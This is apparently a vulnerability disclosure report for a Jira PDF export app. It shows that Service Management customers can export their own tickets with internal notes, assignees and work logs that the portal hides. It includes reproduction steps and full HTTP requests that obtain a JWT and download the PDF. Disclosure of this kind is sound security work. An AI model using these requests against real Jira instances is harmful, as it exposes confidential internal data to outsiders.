The app is available to JSM customers. The app allows to export an issue only when a user has access to the issue, and it is controlled using a document id claim in JWT. However, since JSM customers have access to their JSM tickets, they can export tickets with all information. Some information is not available to customers via portals, for example:

• internal notes

• assignee

• work logs

• attachments (though via the app customers can get only attachments names)

The most important information is internal notes that can contain information not intended to be available to customers.

I believe that access to the app must be forbidden for JSM customers.

Steps to reproduce:

1. Log in as admin, enable Jira Service Management if it is not enabled

2. Go to https://<VICTIM_INSTANCE>.atlassian.net/servicedesk in an incognito browser (the attacker's browser) and sign up

3. Confirm email to complete sign up

4. Create any request on the JSM portal

5. Go to requests history and find there a POST request to /servicedesk/customer/portal/<PORTAL_ID>/create/<ID>, from the response get the created issue id (issue -> id)

6. As the admin open the customer's ticket in Jira and add an internal note (select it in comments section)

7. Send the request below with the issue id from step 5, your subdomain and the attacker's customer cookie:

POST /plugins/servlet/ac/pdf-export-jira/issue-dialog HTTP/2Host: <YOUR_INSTANCE>.atlassian.netCookie: <COOKIE>Content-Type: application/x-www-form-urlencodedContent-Length: 137 plugin-key=pdf-export-jira&product-context=%7B%22issue.id%22%3A%22<ISSUE_ID>%22%7D&key=issue-dialog&width=100%25&height=100%25&classifier=json

Get the url value from the response and open it and get the value of an input element with name jwt from the page html source code.

Send the request below with the JWT from the page source code:

POST /pdf-export-jira/create-pdf HTTP/2Host: contract-signatures.comContent-Type: application/x-www-form-urlencodedContent-Length: 1564 jwt=<JWT>&layout.json=%7B%22paper-size%22%3A%22A4%22%2C%22margin%22%3A%2220mm%22%2C%22gap%22%3A%2210mm%22%2C%22font-family%22%3A%22deja-vu-sans%22%2C%22font-size%22%3A%2210pt%22%2C%22line-height%22%3A%221.2%22%2C%22letter-spacing%22%3A%220%22%2C%22color%22%3A%22%23112244%22%2C%22sections%22%3A%5B%5B%22breadcrumbs%22%2C%22summary%22%2C%22site%22%2C%22labels%22%5D%2C%5B%22status%22%2C%22issue-type%22%2C%7B%22type%22%3A%22last-history-entries%22%2C%22limit%22%3A%2230%22%7D%2C%22reporter%22%2C%22created%22%2C%22original-estimate%22%5D%2C%5B%22resolution%22%2C%22priority%22%2C%22assignee%22%2C%22updated%22%2C%22time-tracking%22%2C%7B%22type%22%3A%22last-comments%22%2C%22limit%22%3A%2230%22%7D%5D%2C%5B%22description%22%2C%22subtasks%22%2C%22linked-issues%22%2C%22remote-links%22%2C%7B%22type%22%3A%22attachments%22%2C%22sort-by%22%3A%22created-desc%22%7D%5D%5D%7D

Get the value of meta tag with name taskId from the response and send open the url below with this task id and the JWT:

https://contract-signatures.com/pdf-export-jira/download-pdf?taskId=<TASK_ID>&jwt=<JWT>

You will get a pdf file with information not available to customers, including internal note.